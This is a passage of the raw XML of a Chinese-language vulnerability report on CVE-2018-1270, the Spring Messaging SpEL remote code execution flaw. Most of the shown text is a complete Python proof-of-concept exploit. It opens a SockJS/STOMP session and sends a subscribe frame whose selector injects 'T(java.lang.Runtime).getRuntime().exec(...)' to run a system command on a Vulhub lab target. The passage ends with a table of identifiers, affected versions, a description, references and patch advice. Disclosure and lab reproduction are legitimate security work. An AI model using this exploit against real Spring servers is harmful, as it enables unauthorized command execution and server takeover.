      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="02CE3D7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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18751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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E50C70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random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF12A7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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6207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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648794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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65608E6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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443CC7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07391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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826BF2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7F852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配置日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423B7B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logging.basicConfig(stream=sys.stdout, level=logging.INFO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B575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63AF5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49FED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def random_str(length):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3137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"""</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成指定长度的随机字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF8CE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letters = string.ascii_lowercase + string.digits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C983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return "".join(random.choice(letters) for _ in range(length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54482EDA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3A35D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3142D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class SockJS(threading.Thread):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF018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__init__(self, url, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BACA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super().__init__(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B7D7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self.base = f"{url}/{random.randint(0, 1000)}/{random_str(8)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F797F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self.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233028D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self.session = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B736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self.session.headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA82D1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"Referer": url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD57A1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"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9451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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9CEFC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self.t = int(time.time() * 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA69BE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B6B54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run(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454EA3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SockJS</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程，通过读取服务器保持连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9104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url = f"{self.base}/htmlfile?c=_jp.vulhub"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2294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response = self.session.get(url, stream=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756F04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for line in response.iter_lines():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B7E1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time.sleep(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64315D6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D9D7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send(self, command, headers, body=""):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44400A5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"""</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SockJS</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器发送命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA322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 = [command.upper(), "\n"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2ED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data.append("\n".join([f"{k}:{v}" for k, v in headers.items()]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930EB5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data.append("\n\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C20A3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data.append(body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E484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data.append("\x00")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8A2E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 = json.dumps(["".join(data)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8DD46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1A498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response = self.session.post(f"{self.base}/xhr_send?t={self.t}", data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582F53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if response.status_code != 204:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05210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    logging.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> '{command}' </w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据出错。</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD10DA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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E052F5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    logging.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> '{command}' </w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据成功。</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5B92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CCEEF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__del__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7BBB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"""</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保对象删除时会话关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E83FD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self.session.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6842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7E27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66FE0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创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SockJS</w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端并启动线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BA7B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sockjs = SockJS("http://your-ip:8080/gs-guide-websocket")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCC25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sockjs.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147337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time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DD26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CE0E3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发送连接命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060433E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sockjs.send("connect", {"accept-version": "1.1,1.0", "heart-beat": "10000,10000"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48E86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0946D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订阅一个主题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFB94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sockjs.send(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A335A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"subscribe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E1A3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E51767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"selector": "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639B68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"id": "sub-0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D0F7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"destination": "/topic/greetings",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E75D0A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9189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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60DEB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4C597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lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00343262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送一条消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610D4F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data = json.dumps({"name": "vulhub"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A10EB9" w14:textId="75BE8B4C" w:rsidR="006447A4" w:rsidRPr="006447A4" w:rsidRDefault="00343262" w:rsidP="006447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sockjs.send("send", {"content-length": len(data), "destination": "/app/hello"}, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66480286" w14:textId="7C3A6151" w:rsidR="006447A4" w:rsidRPr="006447A4" w:rsidRDefault="00B50C17" w:rsidP="006447A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc173000418"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="006447A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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B50C17" w14:paraId="58B84E71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68AE5CA6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30A4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7B003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1EB" w14:textId="7C7EF794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远程命令执行漏洞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FBB25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4BD0" w14:textId="244F2F3D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/>
              </w:rPr>
              <w:t>CVE-2018-1270</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="69248070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1A623C3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BA18" w14:textId="12D51FA1" w:rsidR="00B50C17" w:rsidRDefault="00343262" w:rsidP="00441909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2018</w:t>
            </w:r>
            <w:r w:rsidR="00C319F5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-04-0</w:t>
            </w:r>
            <w:r w:rsidR="0007073C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E04C8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33C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7F1E6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DAE0" w14:textId="38F01A2C" w:rsidR="00B50C17" w:rsidRDefault="00730279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730279">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CNNVD-201804-245</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="1971A973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604A5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C20B" w14:textId="02B20622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2018</w:t>
            </w:r>
            <w:r w:rsidR="0007073C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-04-05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93F7D0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BBE8" w14:textId="02A20020" w:rsidR="00B50C17" w:rsidRDefault="0007073C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Dell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B388D9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D74F" w14:textId="48F31418" w:rsidR="00B50C17" w:rsidRDefault="00730279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730279">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CNVD-2018-07295</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="04391DB8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7E59A6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09F9" w14:textId="6337A149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</w:t>
            </w:r>
            <w:r w:rsidR="0007073C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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5790A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779" w14:textId="6064DF63" w:rsidR="00B50C17" w:rsidRDefault="00BE7EB3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Dell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9D155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273" w14:textId="7D14CCF8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 xml:space="preserve">Spring Messaging CVE-2018-1270 </w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="243092A5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1E35C834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58F6" w14:textId="77777777" w:rsidR="00C319F5" w:rsidRDefault="00343262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使用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模块的应用程序</w:t>
            </w:r>
            <w:r w:rsidR="00C319F5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A5C640" w14:textId="68D8CB9A" w:rsidR="00C319F5" w:rsidRPr="00C319F5" w:rsidRDefault="00C319F5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C319F5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>spring framework &lt; 4.3.16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104E3AC0" w14:textId="63B35D5D" w:rsidR="00B50C17" w:rsidRDefault="00C319F5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C319F5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>5.0.0 &lt;= spring framework &lt; 5.0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="373647CF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767694F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297" w14:textId="6DFB0347" w:rsidR="00B50C17" w:rsidRDefault="00000000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hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="00C319F5">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>CVE-2018-1270: Remote Code Execution with spring-messaging</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="4BD81033" w14:textId="77777777" w:rsidTr="005B6830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6D9895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5170" w14:textId="7B7AD3BA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CVE-2018-1270</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w: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中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模块的一个远程命令执行漏洞。攻击者可以通过未正确验证的输入数据在</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WebSocket</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>订</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>阅过程中插入</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SpEL</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表达式，从而执行任意代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="5B7AD30F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AF25E8D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21E2" w14:textId="68392BC8" w:rsidR="00B50C17" w:rsidRDefault="00343262" w:rsidP="00C319F5">
            <w:pPr>
              <w:pStyle w:val="A8"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both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的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模块存在一个安全漏洞，允许攻击者在</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WebSocket</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>订阅请求中插入恶意的</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表达式语言</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(SpEL)</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表达式。通过该漏洞，攻击者可以执行任意系统命令，从而控制受影响的服务器。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="07AE67B7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11FFDF5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304" w14:textId="0E501EEA" w:rsidR="00730279" w:rsidRPr="00730279" w:rsidRDefault="00000000" w:rsidP="00730279">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="0007073C">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>CVE-2018-1270: Remote Code Execution with spring-messaging</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00730279">
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00730279">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>NVD - CVE-2018-1270 (nist.gov)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="6A0384C7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48CD80FE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5BE1" w14:textId="206A9722" w:rsidR="00B50C17" w:rsidRDefault="00343262" w:rsidP="005B6830">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="0007073C">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Vulhub</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00343262">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00343262">
              <w:t>中</w:t>
            </w:r>
            <w:r>
              <w:t>的相关环境进行漏洞复现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="4016C344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2409AF6B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6FA5" w14:textId="7432FD98" w:rsidR="00B50C17" w:rsidRDefault="0007073C" w:rsidP="005B6830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B50C17" w14:paraId="76777D64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444DD5A1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FD30" w14:textId="77777777" w:rsidR="00C319F5" w:rsidRDefault="00C319F5" w:rsidP="00C319F5">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/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 xml:space="preserve"> Spring Framework</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Spring Framework </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>升级到受影响版本的最新补丁版本，如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5.0.5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4.3.14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3.2.18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获取补丁：目前厂商已发布升级补丁以修复漏洞，补丁获取链接：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1BF46A" w14:textId="4A6AD70E" w:rsidR="00C319F5" w:rsidRPr="0007073C" w:rsidRDefault="00C319F5" w:rsidP="00C319F5">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rStyle w:val="a9"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0007073C">
              <w:rPr>
                <w:rStyle w:val="a9"/>
              </w:rPr>
              <w:t>https://pivotal.io/security/cve-2018-1270</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790957BA" w14:textId="7FA669EA" w:rsidR="00B50C17" w:rsidRDefault="00C319F5" w:rsidP="00C319F5">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入验证：在处理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消息时，确保对用户输入进行严格的验证和过滤，避免直接执行未经验证的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SpEL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表达式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="479DFC37" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="12E1B08F" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="1139EA5D" w14:textId="77777777" w:rsidR="00896FE9" w:rsidRDefault="00896FE9"/>
    <w:sectPr w:rsidR="00896FE9" w:rsidSect="00B50C1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B1CC7" w14:textId="77777777" w:rsidR="00DC3A06" w:rsidRDefault="00DC3A06">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2251E079" w14:textId="77777777" w:rsidR="00DC3A06" w:rsidRDefault="00DC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17ED" w14:textId="77777777" w:rsidR="000776FF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208B57" wp14:editId="7F8E59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9AE68" w14:textId="77777777" w:rsidR="000776FF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08B57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79AE68" w14:textId="77777777" w:rsidR="000776FF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08940" w14:textId="77777777" w:rsidR="00DC3A06" w:rsidRDefault="00DC3A06">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AC32565" w14:textId="77777777" w:rsidR="00DC3A06" w:rsidRDefault="00DC3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F2AF9" w14:textId="77777777" w:rsidR="000776FF" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0B54C140" wp14:editId="4D866FBE">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="6350"/>
          <wp:docPr id="166506059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CC61736"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DE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159218">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="202940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17"/>
    <w:rsid w:val="0007073C"/>
    <w:rsid w:val="000776FF"/>
    <w:rsid w:val="00080F6D"/>
    <w:rsid w:val="00113AF2"/>
    <w:rsid w:val="00116DFF"/>
    <w:rsid w:val="001323D8"/>
    <w:rsid w:val="001B1B2D"/>
    <w:rsid w:val="001F151A"/>
    <w:rsid w:val="002D719F"/>
    <w:rsid w:val="00343262"/>
    <w:rsid w:val="003C0BD7"/>
    <w:rsid w:val="00441909"/>
    <w:rsid w:val="004F650C"/>
    <w:rsid w:val="005F3BA1"/>
    <w:rsid w:val="006161D0"/>
    <w:rsid w:val="0064018A"/>
    <w:rsid w:val="006447A4"/>
    <w:rsid w:val="00693332"/>
    <w:rsid w:val="00730279"/>
    <w:rsid w:val="0078134A"/>
    <w:rsid w:val="008211E3"/>
    <w:rsid w:val="0088351C"/>
    <w:rsid w:val="00896FE9"/>
    <w:rsid w:val="008B500C"/>
    <w:rsid w:val="009A519A"/>
    <w:rsid w:val="00A31640"/>
    <w:rsid w:val="00A57628"/>
    <w:rsid w:val="00AD60C6"/>
    <w:rsid w:val="00B42441"/>
    <w:rsid w:val="00B50C17"/>
    <w:rsid w:val="00BE7EB3"/>
    <w:rsid w:val="00C07834"/>
    <w:rsid w:val="00C319F5"/>
    <w:rsid w:val="00C912BE"/>
    <w:rsid w:val="00CA1594"/>
    <w:rsid w:val="00D67787"/>
    <w:rsid w:val="00DC3A06"/>
    <w:rsid w:val="00E868D6"/>
    <w:rsid w:val="00E9482B"/>
    <w:rsid w:val="00EA15C1"/>
    <w:rsid w:val="00EC0C11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78B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B76733B-2447-43A8-8910-DB8C30B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B50C17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B50C17"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50C17"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2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B50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9"/>
    <w:rsid w:val="00B50C17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Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00B50C17"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character" w:customStyle="1" w:styleId="22">
    <w:name w:val="正文文本缩进 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="21"/>
    <w:rsid w:val="00B50C17"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00B50C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B50C17"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:qFormat/>
    <w:rsid w:val="00B50C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B50C17"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
